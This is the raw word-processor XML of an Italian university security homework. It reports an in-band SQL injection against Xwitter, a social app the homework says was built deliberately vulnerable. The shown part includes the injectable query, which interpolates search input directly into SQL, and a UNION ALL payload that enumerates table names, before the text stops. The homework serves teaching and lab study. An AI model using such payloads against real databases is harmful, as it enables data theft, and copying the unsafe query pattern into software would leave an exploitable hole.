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360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="114935" distR="114935" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1170305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>294640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3420110" cy="1005840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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420110" cy="1005840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SAPIENZA UNIVERSITÀ DI ROMA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="560" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Homework sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SQL injection in-band sull’applicazione web Xwitter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Studente: Simone Di Berardino</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Matricola: 2085977</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Corso: Sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Anno accademico 2025/2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="true"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:br w:type="page"/>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Indice generale</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Saltoaindice"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \f \o "1-9" \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Saltoaindice"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="__RefHeading___Toc184_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>1. Introduzione</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc186_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>2. Contesto applicativo</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc200_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>3. Punto di iniezione: pagina Search user</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc192_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>4. Raccolta di informazioni sulla struttura del database</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="8789"/>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc194_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>4.1 Nomi delle tabelle</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="8789"/>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc196_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>4.2 Nomi delle colonne della tabella users</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc198_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>5. Esfiltrazione dei dati</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Saltoaindice"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__RefHeading___Toc184_3264099342"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr/>
        <w:t>1. Introduzione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo documento descrive una simulazione universitaria di attacco SQL injection di tipo in-band, condotta su un’applicazione web realizzata per </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>l’esperimento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Xwitter). L’applicazione è volutamente vulnerabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alle SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: l’obiettivo è mostrare come un input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>non controllato</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> possa violare le proprietà di riservatezza, integrità e disponibilità (CIA) di un database relazionale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>di un sistema vulnerabile alle SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La traccia richiede di raccogliere informazioni sulla struttura del</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>la base di dati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, esfiltrare dati da una o più tabelle, modificare il contenuto del database e cancellare una o più tabelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="__RefHeading___Toc186_3264099342"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t>2. Contesto applicativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="__RefHeading___Toc188_3264099342"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Xwitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> è una piccola applicazione social che permette agli utenti di registrarsi, effettuare il login, pubblicare post e cercare altri utenti. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="false"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack tecnologico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Frontend:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> React</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Backend:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Database:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>API:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> API REST documentata tramite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>OpenAPI/Swagger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Containerizzazione:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Docker, con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>frontend e backend dockerizzati e mantenuti come container separati</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Architettura:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> applicazione client-server, con il frontend React che comunica con il backend Go tramite API REST; il backend gestisce la logica applicativa e l'accesso ai dati su PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Funzionalità principali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Registrazione e autenticazione degli utenti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pubblicazione di post</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ricerca degli utenti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Modifica profilo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="__RefHeading___Toc200_3264099342"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t>3. Punto di iniezione: pagina Search user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La pagina Search user è vulnerabile a SQL injection. Il testo della search bar viene interpolato in una stringa del tipo:</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SELECT id, username, email, display_name, bio, created_at</w:t>
              <w:br/>
              <w:t>FROM users</w:t>
              <w:br/>
              <w:t>WHERE username ILIKE '&lt;input&gt;'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>L’applicazione chiude l’input con un apice finale. Per questo le stringhe iniettate chiudono l’apice dopo un valore fittizio (test), aprono una UNION ALL e lasciano l’ultimo apice incompleto: è il quote messo dal backend a chiudere l’espressione. Si usano tautologia ('0' = '0) e commento/chiusura di stringa, come richiesto dalla traccia per un attacco in-band basato su input utente. I risultati compaiono nella risposta della search e nei log di rete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="__RefHeading___Toc192_3264099342"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
        <w:t>4. Raccolta di informazioni sulla struttura del database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>L’attaccante non conosce a priori lo schema. Si procede quindi per enumerazione, sfruttando information_schema e il catalogo di PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="__RefHeading___Toc194_3264099342"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr/>
        <w:t>4.1 Nomi delle tabelle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nella search bar è stato inserito il seguente input. La UNION allinea 5 colonne alla SELECT originale; il nome tabella viene messo in seconda posizione, cioè nel campo username della risposta.</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test' UNION ALL SELECT</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    table_name,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL</w:t>
              <w:br/>
              <w:t>FROM information_schema.tables</w:t>
              <w:br/>
              <w:t>WHERE table_type = 'BASE TABLE' AND table_schema = 'public</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
